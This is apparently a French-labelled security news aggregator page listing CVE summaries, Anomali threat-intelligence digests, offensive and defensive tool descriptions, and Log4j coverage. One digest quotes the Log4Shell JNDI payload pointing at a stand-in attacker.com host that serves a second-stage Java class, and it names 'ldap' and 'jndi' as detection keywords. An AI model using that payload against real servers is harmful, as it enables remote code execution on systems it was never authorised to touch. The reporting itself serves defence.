What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-01-18 22:15:08 | CVE-2022-21691 (lien direct) | OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions chat participants can spoof their channel leave message, tricking others into assuming they left the chatroom. | Tool | ★★ | |
|
2022-01-18 22:15:08 | CVE-2022-21693 (lien direct) | OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions an adversary with a primitive that allows for filesystem access from the context of the Onionshare process can access sensitive files in the entire user home folder. This could lead to the leaking of sensitive data. Due to the automatic exclusion of hidden folders, the impact is reduced. This can be mitigated by usage of the flatpak release. | Tool Guideline | ★★★★★ | |
|
2022-01-18 22:15:07 | CVE-2022-21689 (lien direct) | OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network. | Tool | ★★ | |
|
2022-01-18 22:15:07 | CVE-2022-21688 (lien direct) | OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. Affected versions of the desktop application were found to be vulnerable to denial of service via an undisclosed vulnerability in the QT image parsing. Roughly 20 bytes lead to 2GB memory consumption and this can be triggered multiple times. To be abused, this vulnerability requires rendering in the history tab, so some user interaction is required. An adversary with knowledge of the Onion service address in public mode or with authentication in private mode can perform a Denial of Service attack, which quickly results in out-of-memory for the server. This requires the desktop application with rendered history, therefore the impact is only elevated. This issue has been patched in version 2.5. | Tool Vulnerability Guideline | ||
|
2022-01-18 20:15:07 | CVE-2022-21696 (lien direct) | OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions it is possible to change the username to that of another chat participant with an additional space character at the end of the name string. An adversary with access to the chat environment can use the rename feature to impersonate other participants by adding whitespace characters at the end of the username. | Tool | ||
 |
2022-01-18 17:23:12 | \'White Rabbit\' Ransomware May Be FIN8 Tool (lien direct) | It's a double-extortion play that uses the command-line password 'KissMe' to hide its nasty acts and adorns its ransom note with cutesy ASCII bunny art. | Ransomware Tool | ||
 |
2022-01-13 00:37:23 | Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell Backdoor (lien direct) | An Iranian state-sponsored actor has been observed scanning and attempting to abuse the Log4Shell flaw in publicly-exposed Java applications to deploy a hitherto undocumented PowerShell-based modular backdoor dubbed "CharmPower" for follow-on post-exploitation. "The actor's attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations | Tool Vulnerability | ||
 |
2022-01-12 16:00:00 | Anomali Cyber Watch: FluBot, iOS, Ransomware, Zloader, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Phishing, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Attack Misuses Google Docs Comments to Spew Out “Massive Wave” of Malicious Links
(published: January 7, 2022)
Security researchers have seen a very large number of attacks leveraging the comment features of Google Docs to send emails to users containing malicious content. The attackers can create a document, sheet, or slides and add comments tagging any user's email address. Google then sends an email to the tagged user account. These emails come from Google itself and are more likely to be trusted than some other phishing avenues.
Analyst Comment: Phishing education can often help users identify and prevent phishing attacks. Specific to this attack method, users should verify that any unsolicited comments that are received come from the user indicated, and if unsure, reach out separately to the user that appears to have sent the comment to verify that it is real. Links in email should be treated with caution.
MITRE ATT&CK:[MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Phishing - T1156
Tags: Google, Impersonation, Phishing
Finalsite Ransomware Attack Forces 5,000 School Websites Offline
(published: January 7, 2022)
Finalsite, a firm used by schools for website content management, design, and hosting, has been hit by an unknown strain of ransomware that affected approximately 5,000 of their 8,000 customers. The company has said in a statement that many of the affected sites were preemptively shut down to protect user's data, that there is no evidence of that data was breached (although they did not confirm that they had the needed telemetry in place to detect that), and that most of the sites and services have been restored.
Analyst Comment: Verified backup and disaster recovery processes are an important aspect of protecting organizations and allowing for remediation of successful attacks. Monitoring and telemetry can aid in detection and prevention from attacks, and provide evidence as to whether data has been exfiltrated.
MITRE ATT&CK:[MITRE ATT&CK] Web Service - T1102 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Education, Finalsite, Ransomware, Web hosting
FluBot’s Authors Employ Creative and Sophisticated Techniques to Achieve Their Goals in Version 5.0 and Beyond
(published: January 6, 2022)
Security researchers have analyzed a new and more sophisticated version of the FluBot Android malware first detected in early 2020. Once installed on a device, the malware can full |
Ransomware Data Breach Malware Tool Vulnerability Threat Guideline | ||
 |
2022-01-10 10:00:00 | Qu'est-ce qui est mieux que l'intelligence des menaces libres? What\\'s Better Than Free Threat Intelligence? (lien direct) |
Beaucoup diraient que la sécurité efficace n'est pas basée sur les contrôles de sécurité déployés, mais l'expertise et les renseignements derrière ces contrôles.Pour répondre à la question critique: «Notre organisation est-elle à risque?»nécessite un aperçu approfondi de l'évolution du paysage des menaces.Les praticiens de la sécurité doivent savoir qui sont les acteurs de menace les plus prolifiques, les outils qu'ils utilisent et les indicateurs et tactiques, techniques et procédures (TTP) associés à leurs attaques.
Pour aider les organisations de toutes tailles à répondre à beaucoup de ces questions, Mandiant propose un abonnement gratuit et gratuit de
Many would say that effective security is not based on the security controls deployed, but the expertise and the intelligence behind those controls. To answer the critical question, “Is our organization at risk?” requires deep insight into the evolving threat landscape. Security practitioners need to know who the most prolific threat actors are, the tools they are using, and the indicators and tactics, techniques, and procedures (TTPs) associated with their attacks. To help organizations of all sizes better address many of these questions, Mandiant offers a limited, free subscription of |
Tool Threat | ★★★ | |
 |
2022-01-07 22:36:52 | Digital Tool Estimates Software Firewall Credits for Your Environment (lien direct) | Our handy Software NGFW Credit Estimator tool can easily figure out when to dial up and down these instances of our industry-leading NGFWs. | Tool Guideline | ||
|
2022-01-06 12:15:08 | CVE-2021-44564 (lien direct) | A security vulnerability originally reported in the SYNC2101 product, and applicable to specific sub-families of SYNC devices, allows an attacker to download the configuration file used in the device and apply a modified configuration file back to the device. The attack requires network access to the SYNC device and knowledge of its IP address. The attack exploits the unsecured communication channel used between the administration tool Easyconnect and the SYNC device (in the affected family of SYNC products). | Tool Vulnerability | ||
|
2022-01-05 19:55:00 | Anomali Cyber Watch: $5 Million Breach Extortion, APTs Using DGA Subdomains, Cyberespionage Group Incorporates A New Tool, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Data breach, DGA, Infostealer, Phishing, Rootkit, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Fintech Firm Hit by Log4j Hack Refuses to Pay $5 Million Ransom
(published: December 29, 2021)
The Vietnamese crypto trading, ONUS, was breached by unknown threat actor(s) by exploiting the Log4Shell (CVE-2021-44228) vulnerability between December 11 and 13. The exploited target was an AWS server running Cyclos, which is a point-of-sale software provider, and the server was only intended for sandbox purposes. Actors were then able to steal information via the misconfigured AWS S3 buckets containing information on approximately two million customers. Threat actors then attempted to extort five million dollars (USD).
Analyst Comment: Although Cyclos issued a warning to patch on December 13, the threat actors had already gained illicit access. Even though Log4Shell provided initial access to the compromised server, it was the misconfigured buckets the actors took advantage of to steal data.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203
Tags: ONUS, Log4Shell, CVE-2021-44228,
Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends
(published: December 29, 2021)
Palo Alto Networks Unit42 researchers have published a report based on their tracking of strategically-aged malicious domains (registered but not used until a specific time) and their domain generation algorithm (DGA) created subdomains. Researchers found two Pegasus spyware command and control domains that were registered in 2019 and were not active until July 2021. A phishing campaign using DGA subdomains that were similar to those used during the SolarWinds supply chain attack was also identified.
Analyst Comment: Monitor your networks for abnormal DNS requests, and have bandwidth limitations in place, if possible, to prevent numerous connections to DGA domains. Knowing which DGAs are most active in the wild will allow you to build a proactive defense by detecting any DGA that is in use. Anomali can detect DGA algorithms used by malware to assist in defending against these types of threats.
MITRE ATT&CK: [MITRE ATT&CK] Dynamic Resolution - T1568 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Application Layer Protocol - T1071
Tags: DGA , Pegasus, Phishing
Implant.ARM.iLOBleed.a
(published: December 28, 2021)
Amnpardaz researchers discovered a new rootkit that has been targeting Hewlett-Packard Enterprise’s Integrated Lights-Out (iLO) server managemen |
Malware Hack Tool Vulnerability Threat | LastPass | |
 |
2022-01-05 17:24:24 | How to deploy the Portainer container management tool with persistent storage (lien direct) | Looking for a powerful web-based Docker container manager? Jack Wallen shows you how to deploy one of the best on the market. | Tool | ||
 |
2022-01-05 09:55:56 | CredNinja – Test Credential Validity of Dumped Credentials or Hashes (lien direct) |  CredNinja is a tool to quickly test credential validity of dumped credentials (or hashes) across an entire network or domain very efficiently.
At the core of it, you provide it with a list of credentials you have dumped (or hashes, it can pass-the-hash) and a list of systems on the domain (the author suggests scanning for port 445 first, or you can use ââscanâ). It will tell you if the credentials you dumped are valid on the domain, and if you have local administrator access to a host.
Read the rest of CredNinja – Test Credential Validity of Dumped Credentials or Hashes now! Only available at Darknet.
|
Tool | ||
|
2022-01-03 13:15:08 | CVE-2021-24973 (lien direct) | The Site Reviews WordPress plugin before 5.17.3 does not sanitise and escape the site-reviews parameter of the glsr_action AJAX action (available to unauthenticated and any authenticated users), allowing them to perform Cross-Site Scripting attacks against logged in admins viewing the Tool dashboard of the plugin | Tool | ||
|
2021-12-30 14:15:07 | CVE-2021-43861 (lien direct) | Mermaid is a Javascript based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams. Prior to version 8.13.8, malicious diagrams can run javascript code at diagram readers' machines. Users should upgrade to version 8.13.8 to receive a patch. There are no known workarounds aside from upgrading. | Tool | ||
 |
2021-12-30 12:11:04 | GUEST ESSAY: Here\'s how \'WFM\' tools can boost productivity - and security - of remote workers (lien direct) | Workforce management software (WFM) is an essential tool companies across industries can use to organize their workforce, track employee work and performance, forecast labor demand, and create schedules for employees. Related: Turning workers into security security sensors Most, … (more…) | Tool | ||
|
2021-12-29 17:05:47 | assetfinder – Find Related Domains and Subdomains (lien direct) |  assetfinder is a Go-based tool to find related domains and subdomains that are potentially related to a given domain from a variety of sources including Facebook, ThreatCrowd, Virustotal and more.
assetfinder uses a variety of sources including those in the infosec space and social networks which can give relevant info:
crt.sh
certspotter
hackertarget
threatcrowd
wayback machine
dns.bufferover.run
facebook â Needs FB_APP_ID and FB_APP_SECRET environment variables set (https://developers.facebook.com/) and you need to be careful with your appâs rate limits
virustotal â Needs VT_API_KEY environment variable set (https://developers.virustotal.com/reference)
findsubdomains â Needs SPYSE_API_TOKEN environment variable set (the free version always gives the first response page, and you also get â25 unlimited requestsâ) â (https://spyse.com/apidocs)
Sources to be implemented:
http://api.passivetotal.org/api/docs/
https://community.riskiq.com/ (?)
https://riddler.io/
http://www.dnsdb.org/
https://certdb.com/api-documentation
Usage of assetfinder to Find Related Domains and Subdomains
The usage is very simple with only one option basically, to limit the search to subdomains only â by default it will scan for all associated domains and subdomains.
Read the rest of assetfinder – Find Related Domains and Subdomains now! Only available at Darknet.
|
Tool | ||
|
2021-12-29 16:00:00 | Anomali Cyber Watch: Equation Group\'s Post-Exploitation Framework, Decentralized Finance (DeFi) Protocol Exploited, Third Log4j Vulnerability, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache Log4j 2, APT, Malspam, Ngrok relay, Phishing, Sandbox evasion, Scam, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
A Deep Dive into DoubleFeature, Equation Group’s Post-Exploitation Dashboard
(published: December 27, 2021)
Check Point researchers have published their findings on the Equation Group’s post-exploitation framework DanderSpritz — a major part of the “Lost in Translation” leak — with a focus on its DoubleFeature logging tool. DoubleFeature (similar to other Equation Group tools) employs several techniques to make forensic analysis difficult: function names are not passed explicitly, but instead a checksum of it; strings used in DoubleFeature are decrypted on-demand per function and they are re-encrypted once function execution completes. DoubleFeature also supports additional obfuscation methods, such as a simple substitution cipher and a stream cipher. In its information gathering DoubleFeature can monitor multiple additional plugins including: KillSuit (also known as KiSu and GrayFish) plugin that is running other plugins, providing a framework for persistence and evasion, MistyVeal (MV) implant verifying that the targeted system is indeed an authentic victim, StraitBizarre (SBZ) cross-platform implant, and UnitedRake remote access tool (UR, EquationDrug).
Analyst Comment: It is important to study Equation Group’s frameworks because some of the leaked exploits were seen exploited by other threat actors. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place.
MITRE ATT&CK: [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140
Tags: Equation Group, DanderSpritz, DoubleFeature, Shadow Brokers, EquationDrug, UnitedRake, DiveBar, KillSuit, GrayFish, StraitBizarre, MistyVeal, PeddleCheap, DiceDealer, FlewAvenue, DuneMessiah, CritterFrenzy, Elby loader, BroughtHotShot, USA, Russia, APT
Dridex Affiliate Dresses Up as Scrooge
(published: December 23, 2021)
Days before Christmas, an unidentified Dridex affiliate is using malspam emails with extremely emotion-provoking lures. One malicious email purports that 80% of the company’s employees have tested positive for Omicron, a variant of COVID-19, another email claims that the recipient was just terminated from his or her job. The attached malicious Microsoft Excel documents have two anti-sandbox features: they are password protected, and the macro doesn’t run until a user interacts with a pop-up dialog. If the user makes the macro run, it will drop an .rtf f |
Ransomware Malware Tool Vulnerability Threat Conference | APT 35 | |
|
2021-12-28 21:00:00 | New Apache Log4j Update Released to Patch Newly Discovered Vulnerability (lien direct) | The Apache Software Foundation (ASF) on Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month. Tracked as CVE-2021-44832, the vulnerability is rated 6.6 in severity on a scale of 10 and | Tool Vulnerability Threat | ||
 |
2021-12-28 19:23:29 | Researchers Dive Into Equation Group Tool \'DoubleFeature\' (lien direct) | Security researchers at Check Point are publicly documenting the Equation Group APT's DoubleFeature, a component of DanderSpritz post-exploitation framework. | Tool | ||
 |
2021-12-28 14:18:05 | DoubleFeature, post-exploitation dashboard used by Equation Group APT (lien direct) | Researchers analyzed the DoubleFeature logging tool of DanderSpritz Framework that was used by the Equation Group APT group. Check Point researchers have published a detailed analysis of the DoubleFeature tool used to log post-exploitation activities in attacks conducted by the Equation Group and involving the DanderSpritz malware framework. DanderSpritz made the headlines on April 14, […] | Malware Tool | ||
|
2021-12-28 01:47:25 | Experts Detail Logging Tool of DanderSpritz Framework Used by Equation Group Hackers (lien direct) | Cybersecurity researchers have offered a detailed glimpse into a system called DoubleFeature that's dedicated to logging the different stages of post-exploitation stemming from the deployment of DanderSpritz, a full-featured malware framework used by the Equation Group. DanderSpritz came to light on April 14, 2017, when a hacking group known as the Shadow Brokers leaked the exploit tool, among | Malware Tool | ||
 |
2021-12-27 17:28:38 | Mortar Loader: New tool for Process Hollowing written in Pascal (lien direct) | Mortar Loader is a new process hollowing tool that can be leveraged by threat actors. Process Hollowing is a well-known evasion technique used by adversaries to defeat detection and prevention by security products. Mortar Loader is implemented as an open-source tool for red teamers in the Pascal programming language.A loader is malicious code or program used for loading the actual payload on the infected machine.What is Process Hollowing?Process Hollowing is a method of executing arbitrary code in the address space of a separate live process. It is commonly performed by creating a process in a suspended state then unmapping its memory, which can then be replaced with malicious code. Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.How does Mortar Loader work?Mortar has two components, the payload encryptor and the loader itself.The encryptor runs on the attacker's machine to prepare the selected PE payload. It encrypts it with the blowfish symmetric encryption algorithm and encodes the ciphertext with base64.The Loader uses memory stream objects to reverse the operations and decode and decrypt the payload using a hardcoded key. It can be compiled as a standalone executable or a DLL. The plaintext payload is executed using the vanilla Process Hollowing technique without writing it to a file on diskWhat is the Status of Coverage?FortiEDR detects and blocks payloads executed by Mortar Loader out-of-the-box as it detects Process Hollowing from the operating system's perspective.Depending on the enabled set of policies, FortiEDR can block creation of such malicious processes (pre-execution) or malicious operations performed by the payload (post-infection). | Tool Threat | ||
 |
2021-12-23 09:21:00 | CISA Releases Free Scanner to Spot Log4j Exposure (lien direct) | Tool will help security teams root out unpatched instances | Tool | ||
 |
2021-12-22 12:28:37 | CrowdStrike Launches Free Targeted Log4j Search Tool (lien direct) | The recently discovered Log4j vulnerability has serious potential to expose organizations across the globe to a new wave of cybersecurity risks as threat actors look to exploit this latest vulnerability to execute their malicious payloads using remote code execution (RCE). An immediate challenge that every organization faces is simply trying to understand exactly where you […] | Tool Vulnerability Threat | ||
|
2021-12-21 23:01:52 | Active Directory Bugs Could Let hackers Take Over Windows Domain Controllers (lien direct) | Microsoft is urging customers to patch two security vulnerabilities in Active Directory domain controllers that it addressed in November following the availability of a proof-of-concept (PoC) tool on December 12. The two vulnerabilities - tracked as CVE-2021-42278 and CVE-2021-42287 - have a severity rating of 7.5 out of a maximum of 10 and concern a privilege escalation flaw affecting the | Tool | ||
 |
2021-12-21 17:37:20 | PYSA ransomware behind most double extortion attacks in November (lien direct) | Security analysts from NCC Group report that ransomware attacks in November 2021 increased over the past month, with double-extortion continuing to be a powerful tool in threat actors' arsenal. [...] | Ransomware Tool Threat | ||
|
2021-12-21 16:46:02 | Two Active Directory Bugs Lead to Easy Windows Domain Takeover (lien direct) | Microsoft is urging customers to patch two Active Directory domain controller bugs after a PoC tool was publicly released on Dec. 12. | Tool | ||
|
2021-12-20 22:15:07 | CVE-2021-43844 (lien direct) | MSEdgeRedirect is a tool to redirect news, search, widgets, weather, and more to a user's default browser. MSEdgeRedirect versions before 0.5.0.1 are vulnerable to Remote Code Execution via specifically crafted URLs. This vulnerability requires user interaction and the acceptance of a prompt. With how MSEdgeRedirect is coded, parameters are impossible to pass to any launched file. However, there are two possible scenarios in which an attacker can do more than a minor annoyance. In Scenario 1 (confirmed), a user visits an attacker controlled webpage; the user is prompted with, and downloads, an executable payload; the user is prompted with, and accepts, the aforementioned crafted URL prompt; and RCE executes the payload the user previously downloaded, if the download path is successfully guessed. In Scenario 2 (not yet confirmed), a user visits an attacked controlled webpage; the user is prompted with, and accepts, the aforementioned crafted URL prompt; and a payload on a remote, attacker controlled, SMB server is executed. The issue was found in the _DecodeAndRun() function, in which I incorrectly assumed _WinAPI_UrlIs() would only accept web resources. Unfortunately, file:/// passes the default _WinAPI_UrlIs check(). File paths are now directly checked for and must fail. There is no currently known exploitation of this vulnerability in the wild. A patched version, 0.5.0.1, has been released that checks for and denies these crafted URLs. There are no workarounds for this issue. Users are advised not to accept any unexpected prompts from web pages. | Tool Vulnerability | ||
|
2021-12-20 20:35:28 | How to access a remote computer with iDrive\'s Remote Desktop (lien direct) | iDrive offers its own remote desktop tool to help you connect to other computers on your network. | Tool | ||
 |
2021-12-20 00:00:00 | 7 Rapports qui peuvent vous aider à comprendre l'assurance contre le paysage de cyber-assurance continue de faire face à des marges d'érodage, les assureurs ayant du mal à quantifier les risques 7 Reports That Can Help You Understand the Cyber Insurance LandscapeCyber insurance continues to face eroding margins, with insurers having trouble quantifying the risks enterprises faceRead More (lien direct) |
The explosion of ransomware attacks and cybersecurity risk as a whole have made life tough for so many organizations across industries globally. Enterprises need to face these risks in whatâs often a challenging business market anyway, and turning to potential solutions like cyber insurance comes with its own difficulties. The cyber insurance market continues to harden, with insurers facing eroding margins and often struggling to quantify the risk enterprises face. But itâs not all bad news. Cyber insurance companies and other enterprises who want to know the cyber landscape better have a wide range of resources to turn to. As the market matures, many quality research reports have emerged, including several that provide overviews and predictions for what will happen within cyber insurance and cybersecurity as a whole for 2021 and beyond. But which of these research reports should you read to strengthen your cyber knowledge and feel more prepared for what may come? In this article, weâll provide a brief overview of seven of the top cyber insurance research reports for you to consider diving into more.1) Munich Re: Cyber insurance: Risks and trends 2021In the report âCyber insurance: Risks and trends 2021,â the reinsurer Munich Re shares the results of the companyâs first âGlobal Cyber Risk and Insurance Survey.âSome of the key findings include that amidst rapid digitization within companies, approximately four out of five C-suite executives do not think their company has adequate cyber threat protection. The top cyber threats feared by this group include fraud, data breaches and ransomware. The survey also finds gaps in cyber insurance knowledge, but the market could soon grow, with 35% of C-level respondents likely to soon take out a policy.Munich Re also notes the importance of cyber risk accumulation. While the company mentions its own accumulation models, âit is important to monitor the market and seek external expertise from different vendors in order to assure state of the art accumulation management,â the company says.2) Aon: Cyber Insurance Market Insights Q1 2021In one report from Aon, âCyber Insurance Market Insights Q1 2021,â the firm highlights how the cyber insurance industry is changing amidst evolving cyber risks. In particular, the company highlights how issues such as ransomware, silent cyber exposure and the SolarWinds event have affected the cyber insurance market.With SolarWinds, for example, the âtheft of investigative tools from a globally recognised cyber security and forensics firm is likely to lead to improved hacking tools in the hands of cyber criminals,â notes Aon.Amidst this backdrop, Aon sees more hardening within the market through 2021 and 2022. Insurers are looking closely at their underwriting practices while also assessing retention, limits and premiums to figure out the right mix to make cyber insurance viable. 3) Aon: 2021 Cyber Security Risk ReportAnother report by Aon, the â2021 Cyber Security Risk Report,â focuses more on the overall risk landscape from an enterprise perspective. In particular, Aon highlights four main cyber-related risks facing organizations today:Digitization: As companies rapidly digitize, particularly with Covid-19 changing the way many companies work, only 40% say they have âadequate remote work strategies to manage this risk.âThird-Party Risk: Organizations need to be aware of risks in their supply chains and among the various vendors they work with, yet only 21% have implemented âbaseline measuresâ to oversee third-party risk.Ransomware: Ransomware attacks have been prevalent and damaging recently, and many are unprepared. Less than one-third of organizations say theyâve implemented âadequate business resilience measuresâ to handle this risk.Regulation: As stronger data security laws come into place, o | Ransomware Tool Threat Prediction | ★★★ | |
|
2021-12-18 02:24:47 | Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability (lien direct) | The issues with Log4j continued to stack up as the Apache Software Foundation (ASF) on Friday rolled out yet another patch - version 2.17.0 - for the widely used logging library that could be exploited by malicious actors to stage a denial-of-service (DoS) attack. Tracked as CVE-2021-45105 (CVSS score: 7.5), the new vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0, which | Tool Vulnerability | ||
 |
2021-12-18 00:00:00 | Are Endpoints at Risk for Log4Shell Attacks? (lien direct) | We created a free assessment tool for scanning devices to know whether it is at risk for Log4Shell attacks.
|
Tool | ||
|
2021-12-16 19:15:08 | CVE-2021-43837 (lien direct) | vault-cli is a configurable command-line interface tool (and python library) to interact with Hashicorp Vault. In versions before 3.0.0 vault-cli features the ability for rendering templated values. When a secret starts with the prefix `!template!`, vault-cli interprets the rest of the contents of the secret as a Jinja2 template. Jinja2 is a powerful templating engine and is not designed to safely render arbitrary templates. An attacker controlling a jinja2 template rendered on a machine can trigger arbitrary code, making this a Remote Code Execution (RCE) risk. If the content of the vault can be completely trusted, then this is not a problem. Otherwise, if your threat model includes cases where an attacker can manipulate a secret value read from the vault using vault-cli, then this vulnerability may impact you. In 3.0.0, the code related to interpreting vault templated secrets has been removed entirely. Users are advised to upgrade as soon as possible. For users unable to upgrade a workaround does exist. Using the environment variable `VAULT_CLI_RENDER=false` or the flag `--no-render` (placed between `vault-cli` and the subcommand, e.g. `vault-cli --no-render get-all`) or adding `render: false` to the vault-cli configuration yaml file disables rendering and removes the vulnerability. Using the python library, you can use: `vault_cli.get_client(render=False)` when creating your client to get a client that will not render templated secrets and thus operates securely. | Tool Vulnerability Threat | ||
 |
2021-12-16 17:48:04 | (Déjà vu) THREAT ANALYSIS REPORT: Inside the LockBit Arsenal - The StealBit Exfiltration Tool (lien direct) |
The Cybereason Global Security Operations Center (GSOC) issues Cybereason Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them. |
Tool Threat | ||
|
2021-12-16 15:01:35 | How to install the ConfigServer and Security Firewall combo on Ubuntu Server (lien direct) | If you'd like a powerful firewall for your Ubuntu Server, but one that offers a fairly straightforward configuration, Jack Wallen thinks CSF might be the right tool for the job. | Tool | ||
|
2021-12-16 13:45:46 | \'DarkWatchman\' RAT Shows Evolution in Fileless Malware (lien direct) | The new tool manipulates Windows Registry in unique ways to evade security detections and is likely being used by ransomware groups for initial network access. | Ransomware Malware Tool | ||
|
2021-12-15 20:15:08 | CVE-2021-43806 (lien direct) | Tuleap is a Libre and Open Source tool for end to end traceability of application and system developments. In affected versions Tuleap does not sanitize properly user settings when constructing the SQL query to browse and search commits in the CVS repositories. A authenticated malicious user with read access to a CVS repository could execute arbitrary SQL queries. Tuleap instances without an active CVS repositories are not impacted. The following versions contain the fix: Tuleap Community Edition 13.2.99.155, Tuleap Enterprise Edition 13.1-7, and Tuleap Enterprise Edition 13.2-6. | Tool | ||
|
2021-12-15 20:15:08 | CVE-2021-43782 (lien direct) | Tuleap is a Libre and Open Source tool for end to end traceability of application and system developments. This is a follow up to GHSA-887w-pv2r-x8pm/CVE-2021-41276, the initial fix was incomplete. Tuleap does not sanitize properly the search filter built from the ldap_id attribute of a user during the daily synchronization. A malicious user could force accounts to be suspended or take over another account by forcing the update of the ldap_uid attribute. Note that the malicious user either need to have site administrator capability on the Tuleap instance or be an LDAP operator with the capability to create/modify account. The Tuleap instance needs to have the LDAP plugin activated and enabled for this issue to be exploitable. The following versions contain the fix: Tuleap Community Edition 13.2.99.83, Tuleap Enterprise Edition 13.1-6, and Tuleap Enterprise Edition 13.2-4. | Tool | ||
|
2021-12-15 20:15:08 | CVE-2021-41276 (lien direct) | Tuleap is a Libre and Open Source tool for end to end traceability of application and system developments. In affected versions Tuleap does not sanitize properly the search filter built from the ldap_id attribute of a user during the daily synchronization. A malicious user could force accounts to be suspended or take over another account by forcing the update of the ldap_uid attribute. Note that the malicious user either need to have site administrator capability on the Tuleap instance or be an LDAP operator with the capability to create/modify account. The Tuleap instance needs to have the LDAP plugin activated and enabled for this issue to be exploitable. This issue has been patched in Tuleap Community Edition 13.2.99.31, Tuleap Enterprise Edition 13.1-5, and Tuleap Enterprise Edition 13.2-3. | Tool | ||
|
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
|
2021-12-15 14:26:00 | Industry Reactions to Log4Shell Vulnerability (lien direct) | The widely used Log4j logging tool is affected by a critical remote code execution vulnerability that has been increasingly exploited by malicious actors, including profit-driven cybercriminals and state-sponsored groups. | Tool Vulnerability | ||
|
